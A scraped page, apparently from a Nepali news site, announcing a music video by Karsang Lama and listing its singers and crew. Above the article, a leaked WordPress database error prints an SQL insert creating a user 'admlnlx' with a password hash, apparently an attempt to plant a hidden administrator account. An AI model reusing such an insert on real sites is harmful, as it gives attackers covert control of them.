WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxirJpstgqBUzP/arxMCLmzUNB7HEC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 10:59:50', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, गायक एंव सङ्गितकार कार्साङ लामाको ‘तिम्रै लागि मर्छु’ म्युजिक भिडियो डिजिटल बजार युटुबमा सार्वजनिक भएको छ ।
बिरेन्द्र कार्लिलो शब्द, कार्साग लामाको सगित र सगीत सम्योजमा चर्चित गायीका मेलिना राई र कार्साङ लामाको स्वर रहेको छ ।
भिडियोमा कोरियोग्राफि र निर्देशन प्रतिक ङेसुरले गरेका हुन भने छायांकन, सम्पादन सुर्य लामाले गरेका छन भने भिडियोमा फिचरिङ्ग निरान्जली लामा र शिव खड्काको गरेका छन ।